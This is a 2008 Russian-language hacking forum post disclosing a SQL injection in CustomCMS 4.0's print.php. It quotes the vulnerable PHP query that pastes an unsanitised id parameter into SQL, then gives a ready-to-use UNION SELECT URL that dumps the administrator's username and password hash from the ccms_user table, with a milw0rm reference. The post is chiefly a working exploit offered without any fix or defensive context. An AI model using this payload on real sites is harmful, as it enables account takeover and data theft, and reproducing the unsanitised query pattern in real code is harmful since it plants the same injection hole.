
22.08.2008, 23:02
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability
print.php
Vuln code:
PHP код:
$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");
magic_quotes_gpc = Off
http://localhost/ [installdir]/
Exploit:
Код:
print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
http://milw0rm.com/exploits/6284
(c) ~!Dok_tOR!~
Последний раз редактировалось ~!DoK_tOR!~; 25.08.2008 в 05:58..
|
|
|